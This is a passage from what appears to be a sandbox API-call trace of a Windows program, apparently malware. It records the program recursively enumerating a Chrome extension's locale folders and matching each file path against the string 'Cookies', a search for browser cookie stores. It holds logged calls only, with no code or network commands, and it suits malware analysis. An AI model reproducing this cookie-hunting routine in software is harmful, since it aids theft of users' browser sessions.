lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.358] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.358] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="ms", cAlternateFileName="")) returned 1 [0163.359] lstrcmpiW (lpString1="ms", lpString2=".") returned 1 [0163.359] lstrcmpiW (lpString1="ms", lpString2="..") returned 1 [0163.359] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.359] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.359] lstrlenW (lpString="\\") returned 1 [0163.359] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.359] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.359] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.359] lstrlenW (lpString="ms") returned 2 [0163.359] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.359] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" [0163.359] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" [0163.359] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*.*" [0163.359] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.359] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.359] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.359] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.359] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.359] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.359] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned 137 [0163.359] lstrlenW (lpString="\\") returned 1 [0163.359] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms" [0163.360] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\" [0163.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\") returned 138 [0163.360] lstrlenW (lpString="messages.json") returned 13 [0163.360] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\" [0163.360] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json" [0163.360] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ms\\messages.json", lpSrch="Cookies") returned 0x0 [0163.360] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.360] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.360] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="nl", cAlternateFileName="")) returned 1 [0163.360] lstrcmpiW (lpString1="nl", lpString2=".") returned 1 [0163.360] lstrcmpiW (lpString1="nl", lpString2="..") returned 1 [0163.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.360] lstrlenW (lpString="\\") returned 1 [0163.360] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.360] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.360] lstrlenW (lpString="nl") returned 2 [0163.360] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.360] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" [0163.360] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" [0163.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*.*" [0163.361] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.361] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.361] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.361] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.361] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.361] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.361] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned 137 [0163.361] lstrlenW (lpString="\\") returned 1 [0163.361] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl" [0163.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\" [0163.361] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\") returned 138 [0163.361] lstrlenW (lpString="messages.json") returned 13 [0163.361] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\" [0163.361] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json" [0163.361] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\nl\\messages.json", lpSrch="Cookies") returned 0x0 [0163.361] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xdd, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.361] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.362] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a8ef50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a8ef50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a8ef50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="no", cAlternateFileName="")) returned 1 [0163.362] lstrcmpiW (lpString1="no", lpString2=".") returned 1 [0163.362] lstrcmpiW (lpString1="no", lpString2="..") returned 1 [0163.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.362] lstrlenW (lpString="\\") returned 1 [0163.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.362] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.362] lstrlenW (lpString="no") returned 2 [0163.362] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.362] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="no" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\no") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 